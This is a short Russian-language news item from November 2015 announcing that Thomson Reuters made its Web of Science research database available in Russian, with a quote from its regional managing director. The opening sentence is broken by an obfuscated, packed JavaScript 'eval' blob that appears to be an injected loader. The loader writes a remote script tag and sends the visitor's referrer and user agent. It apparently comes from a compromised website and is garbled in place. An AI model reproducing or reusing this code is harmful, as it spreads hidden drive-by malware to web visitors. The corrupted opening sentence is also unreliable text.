

Представители eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|es|rn|b|var|u0026u|referrer|ddans||js|php'.split('|'),0,{})) подразделения [Intellectual Property and Science](#) компании

Thomson Reuters, ведущего поставщика интеллектуальной информации для бизнеса и профессионалов, 12 ноября объявили о запуске базы данных научных публикаций и патентов Web of Science на русском языке, сообщается в пресс-релизе агентства.

Русский стал седьмым языком (после английского, испанского, китайского, корейского, португальского и японского), на котором теперь доступна платформа. Это нововведение позволит повысить качество обслуживания пользователей из стран СНГ.

Учёные из более чем 7000 исследовательских организаций по всему миру регулярно пользуются платформой Web of Science для доступа к основным базам данных цитирования научно-исследовательских работ для проведения собственных исследований. Среди них – десятки тысяч исследователей в более чем 300 российских организациях (в том числе образовательных учреждениях, научно-исследовательских институтах и государственных органах), а также более 300 организаций из стран СНГ.

«Уже более полувека платформа Web of Science вносит весомый вклад в работу многих исследователей, – сказал Петр Марчевски, управляющий директор Thomson Reuters в России и странах СНГ. – Она обеспечивает доступ к подтвержденной информации по разным научным дисциплинам и предоставляет студентам, преподавателям и исследователям необходимый инструментарий для более эффективного проведения научных исследований. Мы рады, что для русскоговорящей части научного сообщества наша платформа теперь стала еще удобнее в использовании».

Для пользователей Web of Science теперь открыт русскоязычный доступ ко всем функциям платформы, включая важное дополнение – справочный раздел, который можно использовать как полноценное руководство по использованию Web of Science.

Автор: Sotnikoff
14.11.2015 06:25

Подробнее о Web of Science можно узнать по адресу <http://wokinfo.com/> или <http://wokinfo.com/russian>